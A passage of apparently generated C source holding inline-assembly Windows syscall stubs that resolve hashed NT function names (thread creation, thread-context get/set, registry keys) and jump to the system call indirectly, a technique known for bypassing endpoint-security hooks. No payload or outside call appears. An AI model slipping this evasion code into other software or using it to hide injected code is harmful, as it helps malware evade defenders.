    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x38985C1E \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x38985C1E \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtMakeTemporaryObject(
    IN HANDLE Handle)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x84DF4D82 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x84DF4D82 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateKey(
    OUT PHANDLE KeyHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN ULONG TitleIndex,
    IN PUNICODE_STRING Class OPTIONAL,
    IN ULONG CreateOptions,
    OUT PULONG Disposition OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xA1B2860C \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xA1B2860C \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtSetValueKey(
    IN HANDLE KeyHandle,
    IN PUNICODE_STRING ValueName,
    IN ULONG TitleIndex OPTIONAL,
    IN ULONG Type,
    IN PVOID SystemData,
    IN ULONG DataSize)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x0A1F2D80 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x0A1F2D80 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtQueryWnfStateNameInformation(
    IN PVOID StateName,
    IN ULONG NameInfoClass,
    IN PVOID ExplicitScope OPTIONAL,
    OUT PVOID InfoBuffer,
    IN ULONG InfoBufferSize)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x14823613 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x14823613 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtUpdateWnfStateData(
    IN PVOID StateName,
    IN PVOID Buffer OPTIONAL,
    IN ULONG Length OPTIONAL,
    IN PCWNF_TYPE_ID TypeId OPTIONAL,
    IN PVOID ExplicitScope OPTIONAL,
    IN WNF_CHANGE_STAMP MatchingChangeStamp,
    IN ULONG CheckStamp)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xE63DF28A \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xE63DF28A \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtOpenEvent(
    OUT PHANDLE EventHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x32A83D3A \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x32A83D3A \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtAlpcConnectPort(
    OUT PHANDLE PortHandle,
    IN PUNICODE_STRING PortName,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
    IN ULONG Flags,
    IN PSID RequiredServerSid OPTIONAL,
    IN OUT PVOID ConnectionMessage OPTIONAL,
    IN OUT PULONG BufferLength OPTIONAL,
    IN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,
    IN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,
    IN PLARGE_INTEGER Timeout OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x6AF3595C \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x6AF3595C \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtAlpcSendWaitReceivePort(
    IN HANDLE PortHandle,
    IN ULONG Flags,
    IN PPORT_MESSAGE SendMessage OPTIONAL,
    IN OUT PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes OPTIONAL,
    OUT PPORT_MESSAGE ReceiveMessage OPTIONAL,
    IN OUT PSIZE_T BufferLength OPTIONAL,
    IN OUT PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes OPTIONAL,
    IN PLARGE_INTEGER Timeout OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xE830236E \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xE830236E \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateThreadEx(
    OUT PHANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN HANDLE ProcessHandle,
    IN PVOID StartRoutine,
    IN PVOID Argument OPTIONAL,
    IN ULONG CreateFlags,
    IN SIZE_T ZeroBits,
    IN SIZE_T StackSize,
    IN SIZE_T MaximumStackSize,
    IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x113F55E3 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x113F55E3 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtDeleteKey(
    IN HANDLE KeyHandle)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x6BDA0E04 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x6BDA0E04 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtPrivilegeCheck(
    IN HANDLE ClientToken,
    IN OUT PPRIVILEGE_SET RequiredPrivileges,
    OUT PBOOL Result)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x12B1DE10 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x12B1DE10 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtCreateEvent(
    OUT PHANDLE EventHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN EVENT_TYPE EventType,
    IN BOOLEAN InitialState)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x10893520 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x10893520 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtTerminateThread(
    IN HANDLE ThreadHandle,
    IN NTSTATUS ExitStatus)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x381B3AB5 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x381B3AB5 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS _NtFsControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG FsControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x20C6D09C \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x20C6D09C \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtGetContextThread(
    IN HANDLE ThreadHandle,
    IN OUT PCONTEXT ThreadContext)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xBA9EF43C \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xBA9EF43C \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtSetContextThread(
    IN HANDLE ThreadHandle,
    IN PCONTEXT Context)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xCB668D44 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xCB668D44 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtResumeThread(
    IN HANDLE ThreadHandle,
    IN OUT PULONG PreviousSuspendCount OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x1339598F \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x1339598F \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtDelayExecution(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER DelayInterval)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xB6EB75BA \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xB6EB75BA \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtGetNextThread(
    IN HANDLE ProcessHandle,
    IN HANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN ULONG HandleAttributes,
    IN ULONG Flags,
    OUT PHANDLE NewThreadHandle)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x1BB0D9EF \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x1BB0D9EF \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS _NtQueryInformationThread(
    IN HANDLE ThreadHandle,
    IN THREADINFOCLASS ThreadInformationClass,
    OUT PTHREAD_BASIC_INFORMATION ThreadInformation,
    IN ULONG ThreadInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x0ACD84E7 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x0ACD84E7 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtOpenThread(
    OUT PHANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x36960437 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x36960437 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
